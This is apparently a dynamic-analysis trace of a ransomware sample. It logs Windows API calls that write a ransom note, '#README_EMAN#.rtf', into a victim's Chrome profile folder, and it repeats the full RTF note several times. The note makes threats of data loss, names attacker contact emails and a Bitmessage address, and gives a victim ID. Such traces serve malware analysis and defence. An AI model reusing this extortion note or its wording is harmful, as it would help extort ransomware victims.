original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.687] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.687] WriteFile (in: hFile=0x2cc, lpBuffer=0x235fca8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x235fca8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.688] CloseHandle (hObject=0x2cc) returned 1 [0289.688] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\#readme_eman#.rtf")) returned 0xffffffff [0289.688] GetLastError () returned 0x2 [0289.688] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\session storage\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0289.689] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a 